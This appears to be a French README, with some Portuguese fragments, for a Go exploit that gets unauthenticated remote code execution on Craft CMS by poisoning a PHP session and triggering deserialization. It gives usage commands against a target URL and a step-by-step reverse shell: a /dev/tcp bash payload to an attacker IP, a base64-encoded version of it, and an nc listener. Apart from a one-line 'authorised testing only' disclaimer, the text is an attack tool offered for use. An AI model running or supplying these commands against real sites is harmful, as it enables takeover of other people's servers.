
Exploit RCE sans authentification pour Craft CMS en Go. Récupère le jeton de session/CSRF, empoisonne la session PHP, déclenche la désérialisation pour l'exécution de commandes ou un shell inverse.
Exploit pour l'exécution de code à distance sans authentification sur Craft CMS, écrit en Go.
Inspiré des travaux originaux de c0gnit00.
GET /admin/loginassets/generate-transform pour inclure et exécuter le fichier empoisonnégo run main.go -u <url> -c <comando>
| Flag | Description | Requis |
|---|---|---|
-u | URL cible (ex : http://target.com) | Oui |
-c | Commande à exécuter (ex : id, whoami) | Oui |
# Sem Asset ID (brute-force automático)
go run main.go -u http://target.com -c whoami
1. Générez le payload en base64 avec votre IP et votre port :
echo 'exec sh -i >& /dev/tcp/SEU_IP/4444 0>&1' | base64
2. Ouvrez le listener :
nc -lvnp 4444
3. Exécutez l'exploit avec le payload :
go run main.go -u http://target.com -c "echo 'ZXhlYyBzaCAtaSA+JiAvZGV2L3RjcC9TRVVfSVAvNDQ0NCAwPiYxCg==' | base64 -d | bash"
Remplacez la valeur en base64 par celle générée à l'étape 1 avec votre IP réelle.
Pour une utilisation exclusive dans des environnements autorisés et des tests de sécurité contrôlés.